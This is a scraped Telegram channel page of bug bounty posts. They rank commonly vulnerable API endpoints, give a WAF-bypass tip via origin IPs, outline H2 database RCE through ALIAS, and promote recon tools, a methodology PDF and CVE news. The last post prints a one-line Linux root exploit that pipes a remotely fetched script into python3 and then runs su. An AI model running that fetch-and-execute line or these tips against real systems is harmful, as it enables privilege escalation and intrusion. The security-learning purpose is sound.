Brut Security
15.6K subscribers
1.01K photos
82 videos
295 files
1.08K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
Sneak Peak of the Contents
❀3πŸ‘1🫑1πŸ—Ώ1
Hey Hunter’s,
DarkShadow is here back again!

Ranking Most common /api vulnerable endpoints:

/api/v1/users
/api/v1/users/{userId}
/api/v1/oauth/token
/api/v1/forgot-password
/api/v1/debug or /api/v1/status


(not only /api/v1 also test for /api/v2)

🀫if WAF blocks your request then find ip origin and it might works with out bypassing by any extra waf bypass payloads!!!

#bugbountytips #info_leak
πŸ”₯8❀1
πŸ”₯ AutoAR = Full Bug Bounty Automation

Recon β†’ Scan β†’ Exploit β†’ Report (automated)

β€’ Subdomains (15+ sources)
β€’ Nuclei + CVE scan
β€’ JS secrets + GitHub leaks
β€’ DNS takeover + misconfigs
β€’ AI agent (FREE)
β€’ Results β†’ Cloudflare R2

Stop manual recon.

https://github.com/h0tak88r/AutoAR
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯9❀7πŸ‘2
This media is not supported in your browser
VIEW IN TELEGRAM
❀3
Web-Check - πŸ•΅οΈβ€β™‚οΈ All-in-one OSINT tool for analysing any website

https://web-check.xyz/
πŸ‘9❀4
πŸ”₯A complete Web Application Bug Bounty Methodology β€” 59 pages, 20 chapters, real techniques I actually use. Covers everything from recon to JWT attacks, SSRF, XSS, file upload RCE, HTTP smuggling, reporting and more.

10 Free Coupons for New Learners--->
▢️ https://topmate.io/saumadip/2054509?coupon_code=awxe
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘2❀1
Hey Hunter's,
DarkShadow is here back again!

🚨 Import schema from H2 Database β†’ RCE via EXEC Alias ⚑

Creating an alias to execute system commands via Java Runtime

πŸ” Quick Analysis:
- Default oken validation
- H2 database exposed with unsafe configurations
- Ability to create custom ALIAS β†’ leads to RCE
- No proper input validation or restriction on JDBC params


ο»Ώ
🧠 Bug Bounty Tips:


- Always check hidden/internal endpoints like "/getSchema", "/actuator", "/env"
- Look for H2 / embedded DB usage β†’ often misconfigured
- Try injecting JDBC params (INIT, TRACE, etc.)
- Don’t ignore default tokens or exposed headers
- Think beyond SQLi β†’ DB features themselves can be weaponize
d



So guys if you really enjoy to read such methods show your love ❀️

#bugbountytips #rce
❀7😱5
πŸ”₯ Ultimate Bug Bounty Goldmine β€” 1000+ Real Writeups

XSS, CSRF, SSRF, IDOR, SQLi, RCE… everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.

Perfect for learning real-world exploitation, not just theory.

GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
❀5πŸ”₯4
Please open Telegram to view this post
VIEW IN TELEGRAM
❀6πŸ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
❀3
🦊 CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

https://github.com/BishopFox/cloudfox
❀8πŸ‘3πŸ”₯3
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support !

Here is 10 coupons who want to grab it for free --
https://topmate.io/saumadip/2054509?coupon_code=qwerty
❀4πŸ”₯2
Reconnaissance- Phase1.pdf
1.5 MB
β˜„οΈBug Bounty Reconnaissance-Phase 1β˜„οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
❀9πŸ”₯4πŸ‘¨β€πŸ’»1
πŸ”₯ GitHub RCE via single git push!

CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).

πŸ”— Learn how header injection led to full compromise β†’ https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
πŸ”₯8πŸ‘6❀4
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!


🚨History Breaking exploit😳

CVE-2026-31431 (nickname: copy fail)

A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!

Exploit code:
curl copy.fail/exp | python3 && su


Guys, AI is going to be very dangerous😨

Don't forget to follow me x.com/darkshadow2bd

#exploit #bugbountytips #linux
❀7πŸ”₯4πŸ‘2